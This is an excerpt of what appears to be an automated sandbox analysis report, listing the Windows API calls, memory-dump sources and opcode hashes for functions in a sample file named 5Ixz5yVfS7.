                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ItemText_swprintf
                  • String ID:
                  • API String ID: 3011073432-0
                  • Opcode ID: 5a380791d70f10ce06c7afd8bbca20765f1a5a1a2b03862c806810b80976aa43
                  • Instruction ID: cb40943e3a8523a9d1894f7898d162b375092e56cd25d13cdbb057643417f20e
                  • Opcode Fuzzy Hash: 5a380791d70f10ce06c7afd8bbca20765f1a5a1a2b03862c806810b80976aa43
                  • Instruction Fuzzy Hash: 85F027719003486AEF11ABA08C0AFAE3F68B706745F000983B601930A1DA716A149A61
                  APIs
                  • DeleteFileW.KERNELBASE(?,?,?,0059984C,?,?,00599688,?,?,?,?,005C1FA1,000000FF), ref: 0059A13E
                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0059984C,?,?,00599688,?,?,?,?,005C1FA1,000000FF), ref: 0059A16C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: aa81593978987e71b9b84fbdfb170c758dad308928e2f953156423a273bff6c7
                  • Instruction ID: 540f27688943739754f0ded35a56732266fb08d246f18a9bd1ff59244efda980
                  • Opcode Fuzzy Hash: aa81593978987e71b9b84fbdfb170c758dad308928e2f953156423a273bff6c7
                  • Instruction Fuzzy Hash: A3E0923564020D6BEF119F60DC49FE97BACBB09381F484065B888D3060DB62AD98FAA0
                  APIs
                  • GdiplusShutdown.GDIPLUS(?,?,?,?,005C1FA1,000000FF), ref: 005AA3D1
                  • CoUninitialize.COMBASE(?,?,?,?,005C1FA1,000000FF), ref: 005AA3D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: GdiplusShutdownUninitialize
                  • String ID:
                  • API String ID: 3856339756-0
                  • Opcode ID: b30e75ba658377486b8a4dad0219e23fcb3f9563c7ad5dc73c2316dba5d27f78
                  • Instruction ID: d4c8f6e1be6d108d8002716b8a19fba97f5f164fb9afb3d975a39b65ca49e49c
                  • Opcode Fuzzy Hash: b30e75ba658377486b8a4dad0219e23fcb3f9563c7ad5dc73c2316dba5d27f78
                  • Instruction Fuzzy Hash: C2F03976658A55EFCB109B4CDC06F59FBA8FB8AB20F04436AF419C3760CB786800CA95
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,?,0059A189,?,005976B2,?,?,?,?), ref: 0059A1A5
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0059A189,?,005976B2,?,?,?,?), ref: 0059A1D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 0539db6cb280b1069c04334dec28a49a86db1abcdb01d18c629e3e1e1af838f6
                  • Instruction ID: a0dd97f63686397f8a9678540839ac1d465a4624dd6c882dff04324d2ec2687e
                  • Opcode Fuzzy Hash: 0539db6cb280b1069c04334dec28a49a86db1abcdb01d18c629e3e1e1af838f6
                  • Instruction Fuzzy Hash: B7E0923650052C9BDF20AB68DC09FD9BB6CBB193E1F0042A2FD44E3290D7719D48AAE0
                  APIs
                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005A00A0
                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0059EB86,Crypt32.dll,00000000,0059EC0A,?,?,0059EBEC,?,?,?), ref: 005A00C2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: DirectoryLibraryLoadSystem
                  • String ID:
                  • API String ID: 1175261203-0
                  • Opcode ID: 3659534d7d2690e5fe1e0b407ce6c05d41d25b32be170525e4019272dd02152d
                  • Instruction ID: fd85316034eae04d4612ee5861bfadbd575ca540c70e08e7c1af643e75147223
                  • Opcode Fuzzy Hash: 3659534d7d2690e5fe1e0b407ce6c05d41d25b32be170525e4019272dd02152d
                  • Instruction Fuzzy Hash: 4AE0927691111C6ADB209AA4AC0DFDB7BACFF09382F0400A6B908E3004DA709A448BA0
                  APIs
                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 005A9B30
                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 005A9B37
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: BitmapCreateFromGdipStream
                  • String ID:
                  • API String ID: 1918208029-0
                  • Opcode ID: 0a915fdae1f94c913df9598e7af23fa6ba24e42a806b8c10f31d970b52deeb78
                  • Instruction ID: 07a1ae9bd81bb29608df70cde932a18bf6ef726ae0f2a837dc6e9c90048da333
                  • Opcode Fuzzy Hash: 0a915fdae1f94c913df9598e7af23fa6ba24e42a806b8c10f31d970b52deeb78
                  • Instruction Fuzzy Hash: 38E0ED75905219EFCB10DF98D505B9EBBF8FF05321F10805FE89593600D6716E449BA1
                  APIs
                    • Part of subcall function 005B329A: try_get_function.LIBVCRUNTIME ref: 005B32AF
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B217A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 005B2185
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: 7c08192e2514a25947a50f948bc3056230009017348f5c6ba42bd016a8d57c16
                  • Instruction ID: 443993925a7d8285e121053b855ecfe29f34af24cf8a0867d6ccec02d63b27e7
                  • Opcode Fuzzy Hash: 7c08192e2514a25947a50f948bc3056230009017348f5c6ba42bd016a8d57c16
                  • Instruction Fuzzy Hash: 8FD0A77410470764291426B8284A4F92F4479A2B70BE00B45E320994E1EE107044E131
                  APIs
                  • DloadLock.DELAYIMP ref: 005ADC73
                  • DloadProtectSection.DELAYIMP ref: 005ADC8F
                    • Part of subcall function 005ADE67: DloadObtainSection.DELAYIMP ref: 005ADE77
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Dload$Section$LockObtainProtect
                  • String ID:
                  • API String ID: 731663317-0
                  • Opcode ID: cacba9d0e7b69791a709b995d7f42cbc09e07754f8fe5e2db150dc9b937d683c
                  • Instruction ID: 6f8a6b59e8c9533de7b8a4c9982d2a1b699029cb0cb9f2c8aa80922bbbd7903d
                  • Opcode Fuzzy Hash: cacba9d0e7b69791a709b995d7f42cbc09e07754f8fe5e2db150dc9b937d683c
                  • Instruction Fuzzy Hash: 52D0C9701802024EC211FB549D4A72C7AB4B766754FA81A01F107C69E2EFAD4C88E665
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ItemShowWindow
                  • String ID:
                  • API String ID: 3351165006-0
                  • Opcode ID: 78cd7885bd1f125deeb8d545aa3e9616c050c7356a44fa5316b45c08f96173ac
                  • Instruction ID: 753c5336a639732f877f4a31f94f2d4148700bb95f510679f6ded34c6b0bc7b4
                  • Opcode Fuzzy Hash: 78cd7885bd1f125deeb8d545aa3e9616c050c7356a44fa5316b45c08f96173ac
                  • Instruction Fuzzy Hash: 81C012B2058200BECB010BB0DC09D3FBFA8ABA4212F05C908B2A5C0060C23CC018EB11
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 5f4b4ac0ae36d206715604451095c87ff1b5afaaa621125ba4021236c4bc0b92
                  • Instruction ID: 470e663e876465ca735e9a2c9d844f8b5e195961fc3abcbf177bf22cf9ce56c9
                  • Opcode Fuzzy Hash: 5f4b4ac0ae36d206715604451095c87ff1b5afaaa621125ba4021236c4bc0b92
                  • Instruction Fuzzy Hash: E4C1D074A04A669FEF15CF68C488BA97FA6BF06300F0844B9DC45DF282CB359D44CB69
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: b85f656ff244aa92137b30cb796f3e976c520cdec12b2d42d81f478456455e9c
                  • Instruction ID: 343f36e1afa6c2875618c1d6fdc5a8a59b5a3ab48a6cefb1b289bc052a89b696
                  • Opcode Fuzzy Hash: b85f656ff244aa92137b30cb796f3e976c520cdec12b2d42d81f478456455e9c
                  • Instruction Fuzzy Hash: 9671CC71104F45AEDF21DB74CC59AEBBBE8BF55301F44492EE5AB87242DA326A48CF10
                  APIs
                  • __EH_prolog.LIBCMT ref: 00598384
                    • Part of subcall function 00591380: __EH_prolog.LIBCMT ref: 00591385
                    • Part of subcall function 00591380: new.LIBCMT ref: 005913FE
                    • Part of subcall function 005919A6: __EH_prolog.LIBCMT ref: 005919AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 4f29bcaab69a25a52e44488ef485e532d1b10486bcbfe244894ded4fb5650629
                  • Instruction ID: ea7d4bc83983f67d9a97ad81a58004684238a31f6eedd3f3109dc71c68bc37e2
                  • Opcode Fuzzy Hash: 4f29bcaab69a25a52e44488ef485e532d1b10486bcbfe244894ded4fb5650629
                  • Instruction Fuzzy Hash: 564184318406569ADF20DB60CC59BFA7BACBF91304F0444EAE54E97093DF756AC8DB50
                  APIs
                  • __EH_prolog.LIBCMT ref: 00591E05
                    • Part of subcall function 00593B3D: __EH_prolog.LIBCMT ref: 00593B42
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 606b2b1485936866186b92911b6c3db5b05d795aefff3ffd8d3fe9edb415bcd9
                  • Instruction ID: 1e4e4ad0a1524153f969340bb9f2cf048260d0d9a52805c083a093903e4fc6bb
                  • Opcode Fuzzy Hash: 606b2b1485936866186b92911b6c3db5b05d795aefff3ffd8d3fe9edb415bcd9
                  • Instruction Fuzzy Hash: 2821373290451A9FCF11EF99D9559EEBFFABF99300F10046EE845A7251CB325E10CB64
                  APIs
                  • __EH_prolog.LIBCMT ref: 005AA7C8
                    • Part of subcall function 00591380: __EH_prolog.LIBCMT ref: 00591385
                    • Part of subcall function 00591380: new.LIBCMT ref: 005913FE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a84399ac691fc44b63c1b0d31b06d48fef40ac41cdb594d8f61e5440022ecaff
                  • Instruction ID: 8a4d367e7645ad88af79cd0c3c1880bf537bde6461be153f837215b9debac906
                  • Opcode Fuzzy Hash: a84399ac691fc44b63c1b0d31b06d48fef40ac41cdb594d8f61e5440022ecaff
                  • Instruction Fuzzy Hash: F3215C71C0465AAACF15DF94C9569EEBFB4FF5A300F0004AEE809B3242DB356E06CB65
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 579f11f37d5b5ea1f00f2363d0976f82261d64613c947f450c3e9c7319e202ed
                  • Instruction ID: 0e74b8bf0ebe1264e57e265c5fc6395da063ce93c5b4ca22f54d3ffb5cf58fcb
                  • Opcode Fuzzy Hash: 579f11f37d5b5ea1f00f2363d0976f82261d64613c947f450c3e9c7319e202ed
                  • Instruction Fuzzy Hash: 51118E73A1052A9BCF22AEACCC469DEBF36FF88750F054519F804A7251CA358D1086A0
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction ID: be52c074786a7377533d6feaf553b8e7720c8dfda2d2aadca767f630e8de0c92
                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction Fuzzy Hash: D3F03C315147069FEF70DA65C94561ABBE8FB15320F20891AE49AC6690E770D880C7A2
                  APIs
                  • __EH_prolog.LIBCMT ref: 00595BDC
                    • Part of subcall function 0059B07D: __EH_prolog.LIBCMT ref: 0059B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: c9e4687b31b4d424afd47ab63d960d2748a8cbf9e94cd8c2b369758822117da1
                  • Instruction ID: d9b2f09baf6300250923d3e78ffeb4eda7cb5fc8bbe2da27edf4352949213c8e
                  • Opcode Fuzzy Hash: c9e4687b31b4d424afd47ab63d960d2748a8cbf9e94cd8c2b369758822117da1
                  • Instruction Fuzzy Hash: D801A234900645DADB25F7A4D0493DDFFA8AF59300F40409DA45A53283CBB41B04C752
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 314797807f346a9b91a699904aea3424cb8eb683eeed26b5eb93e3fed2e60567
                  • Instruction ID: 97d3787741082811dcd654da8719ea9a683968902c1f13451cb03f6892f62a50
                  • Opcode Fuzzy Hash: 314797807f346a9b91a699904aea3424cb8eb683eeed26b5eb93e3fed2e60567
                  • Instruction Fuzzy Hash: D6E0E531540626BBEB312A699C05BFA3F8CBB913B0F142610AC15E21C0CE20FC04C5E9
                  APIs
                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0059A4F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
